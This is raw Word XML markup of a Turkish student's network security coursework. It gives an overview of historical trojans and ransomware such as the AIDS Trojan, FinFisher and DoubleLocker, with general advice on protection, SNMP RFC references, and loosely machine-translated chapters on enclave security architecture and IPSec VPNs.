      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>AIDS Truva Atı</w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1989 ”. Bu kötü amaçlı kod, AIDS hastalığı ile ilgili etkileşimli bir veritabanı içerdiği iddia edilen disketlerde posta yoluyla dağıtıldı. Yüklenen, program 90 açılış döngüsünü bekledi ve daha sonra makinenin kök dizinindeki dosya adlarının çoğunu şifreledi. Yazılımın “lisans sözleşmesi”, kurbanların verilerini geri almak için Panama'daki bir postane kutusuna 189 dolar veya 378 dolar göndermelerini istedi.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w: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Kötü şöhretli casus yazılımlar </w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>FinFisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (FinSpy olarak da bilinir) Truva atının başka bir örneğidir. Kapsamlı casusluk yetenekleri ve web kameralarının ve mikrofonların gizlice kullanımı, klavye hareketlerinin çalınması ve dosyaları süzme yetenekleri ile bilinir. Geliştiriciler tarafından bir yasa uygulama aracı olarak pazarlanmaktadır, ancak baskıcı rejimler tarafından da kullanıldığı düşünülmektedir. FinFisher gerçek amacını gizlemek için çeşitli yöntemler kullanır. ESET tarafından keşfedilen </w:t>
      </w:r>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:r w:rsidRPr="00040B1D">
          <w:rPr>
            <w:rStyle w:val="Kpr"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>kullanımlarından </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">birinde, tarayıcılar ve medya oynatıcılar gibi popüler ve meşru programlar için bir yükleyici olarak ortaya çıktı. Ayrıca sahte ekler veya sahte yazılım güncellemeleri ile e-posta yoluyla dağıtıldı. </w:t>
      </w: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Ancak, Truva atları masaüstüne veya dizüstü bilgisayarlara özel bir tehdit değildir. Günümüzün mobil (ve özellikle Android) kötü amaçlı yazılımlarının büyük bir kısmı da bu kategoriye ait. </w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DoubleLocker </w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Adobe Flash Player güncellemesi olarak gizlenmiş yenilikçi bir fidye ailesiydi. Mobil cihaza Erişilebilirlik hizmetleri aracılığıyla sızdı, verilerini şifreledi ve rasgele bir PIN kodu kullanarak ekranını kilitledi. Ardından, saldırgan, aygıtın ve verilerin kilidini açmak için bitcoin olarak ödeme talep etti. </w:t>
      </w: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15.3 Nasıl K</w:t>
      </w:r>
      <w:r w:rsidRPr="00040B1D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>orunulur?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>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ı adı altında çeşitli kötü amaçlı yazılımlar bulunur bu nedenle yalnızca iyi bir siber temizlik ve güvenilir bir güvenlik çözümünün kullanılmasıyla önlenebilir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4"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Birçok Truva atı, kurbanların sistemlerine sızmak için güvenlik açıklarından yararlanır. Bu güvenlik açıklarını azaltmak için, kullanıcılara yalnızca işletim sistemlerini değil, kullandıkları tüm yazılımları düzenli olarak güncellemeleri ve yamalamaları önerilir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00040B1D"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Truva atları ayrıca sosyal mühendislik teknikleri kullanarak kullanıcıları kandırmaya çalışırlar. Kullanıcıların ve işletmelerin bu tekniklerin farkına varabilmeleri için hem uyanık hem de en son tehditlerden haberdar olmaları gerekmektedir. Düzenli siber güvenlik eğitiminin yanı sıra güvenilir siber güvenlik haberlerini ve kaynakları takip etmek çok işinize yarayacaktır. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00040B1D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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Güvenilir ve çok katmanlı bir güvenlik çözümü, kullanıcının siber savunmasının önemli bir parçasıdır. Truva atları, bir cihaza veya ağa girmek için birkaç kanal kullanabilir. Bu nedenle, modern güvenlik yazılımlarının çoğu, saldırı girişimlerini tespit etmek ve mümkün olan en iyi güvenlik düzeyini sağlamak için sanal alan, emülasyon ve makine öğrenimi gibi çeşitli teknolojiler kullanır. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00040B1D"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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00040B1D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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6. </w:t>
      </w:r>
      <w:r w:rsidRPr="004977F8">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REFERANSLAR</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nternet Mühendisliği Görev Gücü (IETF) Yorum İsteği (RFC) belgeleri: İnternet Mühendisliği Görev Gücü (IETF) Yorum İsteği (RFC) belgeleri:</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089 SNMP over Ethernet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157 SNMP over Ethernet </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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187 Bulk Table Retrieval with the SNMP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215 Convention for Deﬁning Traps for Use with the SNMP RFC-1227 SNMP MUX Protocol and MIB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228 SNMP-DPI: Simple Network Management Protocol Distributed Program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 xml:space="preserve">RFC-1270 SNMP Communications Service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03 A Convention for Describing SNMP-Based Agent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1 SNMP Administrative Model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2 SNMP Security Protocol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3 Deﬁnitions of Managed Objects for Administration of SNMP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81 SNMP MIB Extension for X.25 LAPB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82 SNMP MIB Extension for the X.25 Packet Layer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18 SNMP over OSI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19 SNMP over AppleTalk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20 SNMP over IPX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61 SNMP MIB Extension for Multiprotocol Interconnect over X.25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503 Algorithms for Automating Administration in SNMPv2 Manager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901 Introduction to Community-Based SNMPv2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909 An Administrative Infrastructure for SNMPv2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910 User-Based Security Model for SNMPv2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1 SNMPv2 Management Information Base for the Internet Protocol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2 SNMPv2 Management Information Base for the Transmission Control Protocol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3 SNMPv2 Management Information Base for the User Datagram Protocol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89 V2ToV1 Mapping SNMPv2 onto SNMPv1 within a Bi-Lingual SNMP Agent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RFC-2273 SNMPv3 Applications</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571 An Architecture for Describing SNMP Management Framework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573 SNMP Application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742 Deﬁnitions of Managed Objects for Extensible SNMP Agent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962 An SNMP Application-Level Gateway for Payload Address </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="004977F8" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">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CERT Advisory CA-2002–03</w:t>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Pr="007F7C0D" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F7C0D">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19F39FCE" wp14:editId="324674A2">
            <wp:extent cx="2926080" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="58" name="Resim 58"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Section 2.2.1-2.2.3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Hazırlayan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Adı: Ümit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Soyadı: SARAÇ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Numarası: 140757019</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="007279B1" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Dersi Veren: </w:t>
      </w:r>
      <w:r w:rsidRPr="007279B1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Prof.Dr. Abdulsamet HAŞILOĞLU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Pr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="cente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lastRenderedPageBreak/>
        <w:t>Enclaves: The Enterprise as an Extranet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="cente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Bryan T. Koch, CISSP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pP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t>1.1 Güvenlik içeriği</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Güvenlik politikaları, prosedürleri ve teknolojilerinin, Girişimcilik sistemleri. Ancak, güvenlik tehditlerinin niteliği ve başarılı olma ihtimalleri Kurumsal sistemlere karşı konuşlandırılmış, değişti. Bu kısmen bilgisayar teknolojisi ve bilgisayar ağlarının işletmelere dağılması ve kısmen de internetin bir sonucudur.</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Daha büyük ve daha eski kuruluşlar için, güvenlik açıklarını ve eski anabilgisayar ortamlarındaki tehditler. Daha yeni tehditleri ele almak için eski politikalar tamamlanmıştır bilgisayar virüsleri, uzaktan erişim ve e-posta gibi. Bu yazarın deneyiminde, mevcut politika için nadir ağ tabanlı tehditleri etkin bir şekilde ele almak için çerçeveler. LAN'lar ve PC'ler haline gelenin ilk adımıydı. artan karmaşıklık ve karşılıklı ilişkililik maratonu; intranet (dahili ağlar ve uygulamalara dayalı IP), extranet ve Internet girişimleri bunun en yaygın örneklerid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Kısmen “açık” bir ağ olarak başladığı ve kısmen ticari kullanımın patlaması nedeniyle, İnternet</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yrıca, güvenlik mimarileri, araçları v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nternet’in yüksek tehditli ortamı. Bu ortamdan ortaya çıkan araçların örnekleri arasınd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üvenlik duvarları, sanal özel ağlar ve katmanlı fiziksel mimariler. Bu araçla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nternet extranet için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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pP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t>1.2 Bir Büyük Ağ Paradigmas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Günümüzde ağ mimarları, entegre bir ağ ortamının yaratılmasıyla görevlendiriliyor. Bir ağ</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mimar bunu “her şeyi her şeye, tam şeffaflıkla bağlamak” için bir görev olarak tanımlad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azar buna One Big Network paradigması olarak atıfta bulunur. Bu yazarın deneyiminde, bazı ağ mimarlar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Güvenliği kolun uzunluğunda tutmayı hedefliyoruz - “biz inşa ediyoruz, güvenceye alıyorsunuz ve birbirimizle konuşmak zorunda değiliz”</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Bu, birleşme ve satın almalardan kaynaklanan hızlı büyümenin mevcut güvenlik bağlamında savunulamaz.</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One Big Network, ağ tasarımcıları, ağ kullanıcıları ve şirket yöneticileri için baştan çıkarıcı bir vizyondur. Bir Büyük Ağ - teorik olarak - tedarikçilerle, iş dünyası ile yeni ve daha iyi etkileşimler sağlayacak müşteriler ve son tüketicilerle. One Big Network’e bağlı herkes - teoride - mükemmel şekilde Minimum altyapı maliyetinden faydalanır. Elektronikten işletmeye ve elektronik-ticaret olacak - teoride - her yerde.</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 xml:space="preserve">Bununla birlikte, kritik bir unsur bu cesur yeni dünyanın dışında bırakıldı: güvenlik. On yıldan fazla olmasına rağmen ağ oluşturma ve kişisel bilgisayarlarda, birçok kurumsal güvenlik ilkesi mirası hedeflemeye devam ediyor çevre, bir bütün olarak ağ değil. Bu politikalar tek başına güvencenin mümkün olduğunu varsaymaktadır “Sistemler” veya </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>“uygulamalar” sanki kurumun geri kalanından bağımsız bir varlığa sahipler. Varsayıyorlar Saldırganların, İnternet’in çeşitli bölümlerini birbirine bağlayan ağ altyapısı yerine uygulamaları hedefleyeceği birlikte dağıtılmış uygulama. Günümüzün otomatik saldırı araçları, ağı tanımlamak için bir bütün olarak hedeflemekte ve zayıf uygulamalara ve sistemlere saldırın ve daha sonra saldırılar için bu sistemleri kullanın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pP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t>1.3 Ağ Güvenliği ve Bir Büyük Ağ Paradigmas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 xml:space="preserve">Bir Büyük Ağın yeterince güvenli bir şekilde güvence altına alınabileceği bir zaman olabilir. </w:t>
      </w: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Eğer varsa, o</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ün uzun geçmiş. Bugünün ağları çok daha büyük, çok daha çeşitli, çok daha fazla uygulama çalıştırmak</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Kötü adamların” daha iyi olduğu daha düşmanca bir ortamda daha farklı örgütler bağlayın</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her zamankinden daha araçları. Yazar, makul bir güven düzeyinde güvenceye almanın mümkün olmadığını düşünüyo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ğın tek bir "düz" ağ olarak yönetildiği herhangi bir büyük kuruluş için herhangi bir kurumsal ağ</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herhangi bir şekilde” bağlantısı il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Etkili bir iç ağ güvenlik kontrolünün olmadığı bir ortamda, her ağ düğümü bir tehdit oluşturu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diğer her düğüme karşı. (Matematiksel olarak n ağ düğümünün olduğu yerde, tehdit sayıs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aklaşık n2</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 Kurumun güvenlik duvarı olmadan da internette olması durumund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tehditler esasen sonsuz hale gelir (bkz. Ek 31.1).</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Etkili kurumsal güvenlik mimarisi, geleneksel, uygulama tabanlı araç setini, ağ tabanlı tehditlere yönelik ağ tabanlı araçlarla genişletmelidir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pP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t>1.4 İnternet Güvenliği Mimarisi Elemanları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>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İnternet ve extranet için işletmelerden daha farklı bir tasarım nasıl yapılır? İnternet Nedir / extranet güvenlik mühendisliği ilkeleri?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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Basitlik. Karmaşıklık güvenlik düşmanıdır. Karmaşık sistemler daha fazla bileşene sahip, daha tek</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aşarısızlık noktaları, başarısızlıkların birbiri üzerine basabileceği daha fazla puan ve daha zordur“iyi bilinen” olarak belgelendirmek (nadiren bilinen iyi bi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">leşenlerden yapılmış olsa (bile </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>kendisi) bulunur.</w:t>
      </w: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Önceliklendirme ve değerleme. İnternet güvenlik sistemleri neyi korumak is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tediklerini biliyor. Hassasiyet </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ve her bir öğenin güvenlik açığı hem kendi başına hem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">de diğeriyle birlikte anlaşılır </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>tasarım unsurları.</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r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Varsayılan olarak reddet, ilke tarafından izin ver. İnternet güvenlik mimarileri, tüm trafiğin olduğu öncülüyle başlar reddedilmek. Yalnızca görevi gerçekleştirmek için açıkça gerekli olan trafik etkinleştirilir ve bu tanımlanmış, belgelenmiş ve analiz edilmiş yollar ve mekanizmala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Pr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="005C7B52">
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
        <w:t>Uçtan uca, yoldan yola analiz. İnternet güvenliği mühendisliği, her ikisi de tüm bileşenlere baka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kurumsal taraf ve her işlemin uzak tarafında. Herhangi bir bileşenin arızası veya tehlikes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tüm sistemin güvenliğini baltalayabilir. Potansiyel zayıf noktalar anlaşılmalı ve eğe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mümkün, başardı. Artık riskler hem işletme hem de işletme tarafından anlaşılmalıd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ortaklar ve müşterile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lastRenderedPageBreak/>
        <w:t>1.5 Enclave Yaklaşımı</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Bu bölüm, işletmeyi bir extranet olarak ele almayı önermektedir. Extranet modeli, bir mimariyi çağırıyor ilk hedefi olarak güvenliği vardır. Bir işletmenin gerçekten neye önem verdiğini belirlemek anlamına gelir: Ne yaşıyor? ya da ölür. Kritik ve güvenli bileşenleri tespit eder ve bunları korunan yerleşim bölgelerine izole eder. Erişim yerleşim bölgeleri ile işletme arasındaki ağ koruyucuları tarafından yönetilir. Yerleşim bölgesi içinde, güvenlik hedefi geleneksel kontrolleri tutarlı ve iyi uygulamaktır. Enklavların dışında, mevcut uygulama (yani güvenlik kontrolleri) resmi güvenlik politikalarına bağlı olarak), teşvik edilmese de, gerçeklik olarak kabul edilmektedir. Bu yeniden yapılanma bazı ağ güvenliği tehditlerini büyüklük sırasına göre azaltabilir. Aşırı ele alındığında, tüm iş biriminden iş birimine etkileşimler enklavlardan geçer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="tlid-translation"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:jc w:val="center"/>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IPSec Virtual Private Networks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="005C7B52" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:jc w:val="cente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James S. Tiller, CISA, CISSP</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b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
